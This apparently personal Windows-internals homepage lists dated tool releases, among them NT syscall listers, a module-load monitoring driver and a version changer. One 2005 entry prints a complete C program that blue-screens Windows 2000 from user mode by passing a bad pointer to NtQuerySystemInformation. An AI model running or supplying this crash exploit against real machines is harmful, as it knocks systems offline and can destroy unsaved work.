![]() |
Omega Red's garbage heapInformation wants to be free. |
29.04.2006Differences between RaiseException on 32- and 64-bit OS (32-bit code) - RaiseException.zip10.03.2007Omega Red's ToolKit - updated driver from ModLoad.20.02.2007Module load notification - driver & usermode client, example of using PsSetLoadImageNotifyRoutine callback to monitor all modules loaded by the system.05.02.2007Fixed Syscall lister for multiprocessor systems.07.10.2006Guestbook: adding entries disabled. Too much spambots, and I didn't feel like updating this obsolete piece of code. You can always reach me by email.10.07.2006Lister of NT syscalls, 64bit version.06.07.2006Windows version changer30.06.2006Vulnerant omnes, ultima necat. Part deux. [pl]15.12.2005Lister of NT syscalls, example of driver writing & using dbghelp.dll.13.12.2005How to BSOD windows 2000 from user mode? It's simple:#include <windows.h> typedef DWORD (WINAPI *NtQSI) (DWORD, void*, DWORD, DWORD*); // NtQuerySystemInformation int main() { DWORD size; NtQSI NtQuerySystemInformation = (NtQSI) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); NtQuerySystemInformation(11, (void*)0xcccccccc, 0, &size); return 0; } Copyright by Omega Red 2003,2004 |